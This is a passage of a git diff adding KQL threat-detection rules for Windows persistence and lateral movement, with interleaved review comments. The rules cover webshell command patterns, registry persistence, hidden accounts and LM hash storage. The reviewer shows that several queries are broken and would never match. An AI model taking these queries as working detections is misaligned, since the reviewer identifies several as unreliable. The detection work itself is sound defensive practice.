+| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql b/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql
new file mode 100644
index 00000000..03ff0711
--- /dev/null
+++ b/KQL/rules/Lateral Movement/wmiexec_default_output_file.kql
@@ -0,0 +1,12 @@
+// Title: Wmiexec Default Output File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-02
+// Level: critical
+// Description: Detects the creation of the default output filename used by the wmiexec tool
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.execution, attack.t1047
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath matches regex "\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "C:\\\\__1\\d{9}\\.\\d{1,7}$" or FolderPath matches regex "D:\\\\__1\\d{9}\\.\\d{1,7}$"
\ No newline at end of file
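Review bot: In the wmiexec hunk, `matches regex` is case-sensitive in KQL, so `\\Windows\\__1…` and the `C:`/`D:` roots only hit when `FolderPath` is recorded with that exact casing; path casing in endpoint telemetry is not guaranteed, and the other rules in this patch rely on the case-insensitive `endswith`/`startswith`. Prefix each pattern with `(?i)`, e.g. `FolderPath matches regex @"(?i)\\Windows\\__1\d{9}\.\d{1,7}$"`, and do the same for the two drive-root alternatives. As with the PsExec rule, `ActionType` is unconstrained, so this critical alert also fires on the delete wmiexec performs after reading the output; `ActionType == "FileCreated"` keeps it to the write itself.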
diff --git a/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql b/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql
new file mode 100644
index 00000000..6c6dcc17
--- /dev/null
+++ b/KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql
@@ -0,0 +1,12 @@
+// Title: Abuse of Service Permissions to Hide Services Via Set-Service
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-17
+// Level: high
+// Description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.011
+// False Positives:
+// - Rare intended use of hidden services
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "DCLCWPDTSD")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql b/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql
new file mode 100644
index 00000000..ed568d7c
--- /dev/null
+++ b/KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql
@@ -0,0 +1,10 @@
+// Title: Activate Suppression of Windows Security Center Notifications
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set Notification_Suppress to 1 to disable the Windows security center notification
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\\Notification_Suppress"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql b/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql
new file mode 100644
index 00000000..e3f8d755
--- /dev/null
+++ b/KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql
@@ -0,0 +1,12 @@
+// Title: Add Debugger Entry To AeDebug For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate use of the key to setup a debugger. Which is often the case on developers machines
+
+DeviceRegistryEvents
+| where (RegistryValueData endswith ".dll" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger") and (not(RegistryValueData =~ "\"C:\\WINDOWS\\system32\\vsjitdebugger.exe\" -p %ld -e %ld -j 0x%p"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql b/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql
new file mode 100644
index 00000000..88024939
--- /dev/null
+++ b/KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql
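Review bot: Both tests in the Notification_Suppress query are written against Sysmon conventions and, as far as I can tell, will never match Defender for Endpoint data: in `DeviceRegistryEvents` the value name lives in its own column (`RegistryValueName`), `RegistryKey` ends at the key, and DWORD data is recorded as a plain decimal string rather than `DWORD (0x00000001)`. Suggest `| where ActionType == "RegistryValueSet" and RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration" and RegistryValueName =~ "Notification_Suppress" and RegistryValueData == "1"`. The same two issues affect every `DeviceRegistryEvents` rule in this patch that ends the key with a value name or compares against a `DWORD (0x…)` literal (AeDebug, Hangs, DisallowRun, fAllowToGetHelp, CrashControl, the "Disable Internal Tools" list, UseActionCenterExperience), so a pipeline-level transformation of `TargetObject`/`Details` would fix them all at once. Please verify against a sample event before changing, as the exact data formatting may vary by value type.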
@@ -0,0 +1,12 @@
+// Title: Add Debugger Entry To Hangs Key For Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - This value is not set by default but could be rarly used by administrators
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql b/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql
new file mode 100644
index 00000000..8768d399
--- /dev/null
+++ b/KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql
@@ -0,0 +1,10 @@
+// Title: Add DisallowRun Execution to Registry
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set DisallowRun to 1 to prevent user running specific computer program
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql b/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql
new file mode 100644
index 00000000..387f4a93
--- /dev/null
+++ b/KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql
@@ -0,0 +1,12 @@
+// Title: Allow RDP Remote Assistance Feature
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect enable rdp feature to allow specific user to rdp connect on the targeted machine
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate use of the feature (alerts should be investigated either way)
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/change_the_fax_dll.kql b/KQL/rules/Persistence/change_the_fax_dll.kql
new file mode 100644
index 00000000..1ed01153
--- /dev/null
+++ b/KQL/rules/Persistence/change_the_fax_dll.kql
@@ -0,0 +1,10 @@
+// Title: Change the Fax Dll
+// Author: frack113
+// Date: 2022-07-17
+// Level: high
+// Description: Detect possible persistence using Fax DLL load when service restart
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Fax\\Device Providers*" and RegistryKey contains "\\ImageName") and (not(RegistryValueData =~ "%systemroot%\\system32\\fxst30.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql b/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql
new file mode 100644
index 00000000..0a510014
--- /dev/null
+++ b/KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql
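Review bot: In the Fax DLL hunk, `RegistryKey endswith "\\Software\\Microsoft\\Fax\\Device Providers*"` keeps the Sigma wildcard as a literal asterisk; `endswith` does no globbing, so the predicate only matches a key whose name really ends in `*` and the rule is dead. The `contains "\\ImageName"` test already anchors the value, so `RegistryKey contains "\\Software\\Microsoft\\Fax\\Device Providers\\"` is the intended first clause — and, as with the other registry rules here, `ImageName` is a value name that MDE reports in `RegistryValueName`, not at the end of `RegistryKey`. If the converter is expected to turn a trailing `*` into `startswith`/`contains`, this is a backend or pipeline bug that recurs in the ClickOnce and hidden-user rules of this patch. The exclusion compares the full `%systemroot%\system32\fxst30.dll` string with `=~`, so a value written with an expanded `C:\Windows\…` path would still alert; probably acceptable, but worth a false-positive note.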
@@ -0,0 +1,10 @@
+// Title: Change User Account Associated with the FAX Service
+// Author: frack113
+// Date: 2022-07-17
+// Level: high
+// Description: Detect change of the user account associated with the FAX service to avoid the escalation problem.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName" and (not(RegistryValueData contains "NetworkService"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/chopper_webshell_process_pattern.kql b/KQL/rules/Persistence/chopper_webshell_process_pattern.kql
new file mode 100644
index 00000000..c9f272f5
--- /dev/null
+++ b/KQL/rules/Persistence/chopper_webshell_process_pattern.kql
@@ -0,0 +1,10 @@
+// Title: Chopper Webshell Process Pattern
+// Author: Florian Roth (Nextron Systems), MSTI (query)
+// Date: 2022-10-01
+// Level: high
+// Description: Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "&ipconfig&echo" or ProcessCommandLine contains "&quser&echo" or ProcessCommandLine contains "&whoami&echo" or ProcessCommandLine contains "&c:&echo" or ProcessCommandLine contains "&cd&echo" or ProcessCommandLine contains "&dir&echo" or ProcessCommandLine contains "&echo [E]" or ProcessCommandLine contains "&echo [S]") and (FolderPath endswith "\\w3wp.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql b/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql
new file mode 100644
index 00000000..e9c0a017
--- /dev/null
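Review bot: The exact match `RegistryKey =~ "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\Fax\\ObjectName"` cannot hit: `CurrentControlSet001` is not a real key (the live hive is `CurrentControlSet`, with `ControlSet001`/`ControlSet002` as the on-disk copies), and `ObjectName` is a value name, which MDE exposes in `RegistryValueName` rather than at the end of `RegistryKey`. If the string is carried over verbatim, the upstream rule has the same typo and deserves a report. Suggest `| where RegistryKey endswith "\\Services\\Fax" and RegistryValueName =~ "ObjectName" and not(RegistryValueData contains "NetworkService")` — `endswith` also covers the `ControlSet00N` forms and the `HKLM` prefix variants.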
+++ b/KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql
@@ -0,0 +1,12 @@
+// Title: Chromium Browser Instance Executed With Custom Extension
+// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
+// Date: 2022-06-19
+// Level: medium
+// Description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1176.001
+// False Positives:
+// - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql b/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql
new file mode 100644
index 00000000..474eef12
--- /dev/null
+++ b/KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql
@@ -0,0 +1,12 @@
+// Title: ClickOnce Trust Prompt Tampering
+// Author: @SerkinValery, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate internal requirements.
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "Enabled" and RegistryKey endswith "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel*" and (RegistryKey endswith "\\Internet" or RegistryKey endswith "\\LocalIntranet" or RegistryKey endswith "\\MyComputer" or RegistryKey endswith "\\TrustedSites" or RegistryKey endswith "\\UntrustedSites")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/com_hijack_via_sdclt.kql b/KQL/rules/Persistence/com_hijack_via_sdclt.kql
new file mode 100644
index 00000000..b08432c8
--- /dev/null
+++ b/KQL/rules/Persistence/com_hijack_via_sdclt.kql
@@ -0,0 +1,10 @@
+// Title: COM Hijack via Sdclt
+// Author: Omkar Gudhate
+// Date: 2020-09-27
+// Level: high
+// Description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1546, attack.t1548
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql b/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql
new file mode 100644
index 00000000..191ccce8
--- /dev/null
+++ b/KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql
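Review bot: The ClickOnce query requires `RegistryKey endswith "...\\PromptingLevel*"` and, in the same conjunction, `RegistryKey endswith "\\Internet"` (or another zone); a single string cannot end with both, and the trailing `*` is a Sigma wildcard left as a literal character, so the predicate is always false and the rule never fires. The zone names are value names under `PromptingLevel`, so on MDE the shape should be `RegistryKey endswith "\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel" and RegistryValueName in~ ("Internet", "LocalIntranet", "MyComputer", "TrustedSites", "UntrustedSites") and RegistryValueData =~ "Enabled"`. The sdclt COM-hijack hunk in this same span relies on `DelegateExecute` (a value name) being at the end of `RegistryKey` and has the same problem.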
@@ -0,0 +1,10 @@
+// Title: Communication To Uncommon Destination Ports
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: medium
+// Description: Detects programs that connect to uncommon destination ports
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.command-and-control, attack.t1571
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("8080", "8888")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql b/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql
new file mode 100644
index 00000000..17b2e4c6
--- /dev/null
+++ b/KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql
@@ -0,0 +1,12 @@
+// Title: CrashControl CrashDump Disabled
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2022-02-24
+// Level: medium
+// Description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1564, attack.t1112
+// False Positives:
+// - Legitimate disabling of crashdumps
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "SYSTEM\\CurrentControlSet\\Control\\CrashControl"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql b/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql
new file mode 100644
index 00000000..318b3b95
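Review bot: The private-range exclusion calls `ipv4_is_in_range` with IPv6 CIDRs (`::1/128`, `fe80::/10`, `fc00::/7`); those calls cannot succeed and, as I read KQL's null semantics, return null, which turns `false or null` into null and `not(null)` into null, so the `where` discards the row — a connection to a public IPv4 address on 8080 would then never alert. Replace the three calls with the IPv6-aware function, `ipv6_is_match(RemoteIP, "::1/128") or ipv6_is_match(RemoteIP, "fe80::/10") or ipv6_is_match(RemoteIP, "fc00::/7")` (it accepts IPv4 input as well), and confirm on live data with a known 8080 connection. Separately, `in~` is a string operator; `RemotePort` is an integer column, so `RemotePort in (8080, 8888)` is the direct form and avoids a type error or implicit conversion.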
--- /dev/null
+++ b/KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql
@@ -0,0 +1,10 @@
+// Title: Creation of a Local Hidden User Account by Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-05-03
+// Level: high
+// Description: Sysmon registry detection of a local hidden user account.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/creation_of_a_local_user_account.kql b/KQL/rules/Persistence/creation_of_a_local_user_account.kql
new file mode 100644
index 00000000..2d44ba9d
--- /dev/null
+++ b/KQL/rules/Persistence/creation_of_a_local_user_account.kql
@@ -0,0 +1,12 @@
+// Title: Creation Of A Local User Account
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: low
+// Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
+// MITRE Tactic: Persistence
+// Tags: attack.t1136.001, attack.persistence
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "create" and FolderPath endswith "/dscl") or (ProcessCommandLine contains "addUser" and FolderPath endswith "/sysadminctl")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql b/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql
new file mode 100644
index 00000000..a66f52c7
--- /dev/null
+++ b/KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql
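Review bot: `RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$"` is self-contradictory — `endswith` is a literal test, the `*` is an untranslated Sigma wildcard, and no key can end in both `Names*` and `$` — so this high-severity rule is always false. The intent is a subkey under `…\Users\Names\` whose name ends with `$`: `| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey contains "\\SAM\\SAM\\Domains\\Account\\Users\\Names\\" and RegistryKey endswith "$"`. The description itself says this is a Sysmon detection, so whether `DeviceRegistryEvents` records lsass's SAM writes at all should be validated before the rule is trusted.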
@@ -0,0 +1,12 @@
+// Title: Disable Internal Tools or Feature in Registry
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate admin script
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\InactivityTimeoutSecs" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisableCMD" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or 
RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/disable_windows_security_center_notifications.kql b/KQL/rules/Persistence/disable_windows_security_center_notifications.kql
new file mode 100644
index 00000000..e05e5ac6
--- /dev/null
+++ b/KQL/rules/Persistence/disable_windows_security_center_notifications.kql
@@ -0,0 +1,10 @@
+// Title: Disable Windows Security Center Notifications
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql
new file mode 100644
index 00000000..dab5469d
--- /dev/null
+++ b/KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql
@@ -0,0 +1,12 @@
+// Title: DLL Search Order Hijackig Via Additional Space in Path
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-30
+// Level: high
+// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
+but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1574.001
+
+DeviceFileEvents
+| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql
new file mode 100644
index 00000000..eac11d71
--- /dev/null
+++ b/KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql
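Review bot: The description continuation line `+but with a space in order to trick DLL load search order ...` is written without a `//` prefix, so in the generated .kql it is not a comment but a bare line of text ahead of `DeviceFileEvents`, and I expect the query to fail to parse as a result. The header writer in the conversion script should prefix every line of a multi-line Sigma description, e.g. `// but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack`. The same unprefixed continuation lines appear in the DNS-over-HTTPS, both NoLMHash, PowerUp, Teams/OneDrive DLL, systemctl mask, BITS and NGenAssemblyUsageLog rules in this patch.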
@@ -0,0 +1,15 @@
+// Title: DNS-over-HTTPS Enabled by Registry
+// Author: Austin Songer
+// Date: 2021-07-22
+// Level: medium
+// Description: Detects when a user enables DNS-over-HTTPS.
+This can be used to hide internet activity or be used to hide the process of exfiltrating data.
+With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1140, attack.t1112
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/dropping_of_password_filter_dll.kql b/KQL/rules/Persistence/dropping_of_password_filter_dll.kql
new file mode 100644
index 00000000..9ab99016
--- /dev/null
+++ b/KQL/rules/Persistence/dropping_of_password_filter_dll.kql
@@ -0,0 +1,10 @@
+// Title: Dropping Of Password Filter DLL
+// Author: Sreeman
+// Date: 2020-10-29
+// Level: medium
+// Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.credential-access, attack.t1556.002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "scecli\\0" and ProcessCommandLine contains "reg add"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/enable_lm_hash_storage.kql b/KQL/rules/Persistence/enable_lm_hash_storage.kql
new file mode 100644
index 00000000..ebf62ff6
--- /dev/null
+++ b/KQL/rules/Persistence/enable_lm_hash_storage.kql
@@ -0,0 +1,12 @@
+// Title: Enable LM Hash Storage
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-15
+// Level: high
+// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql
new file mode 100644
index 00000000..798ffe5e
--- /dev/null
+++ b/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql
@@ -0,0 +1,12 @@
+// Title: Enable LM Hash Storage - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-12-15
+// Level: high
+// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
+By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
+
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql b/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql
new file mode 100644
index 00000000..cae96f9e
--- /dev/null
+++ b/KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql
@@ -0,0 +1,10 @@
+// Title: Enabling COR Profiler Environment Variables
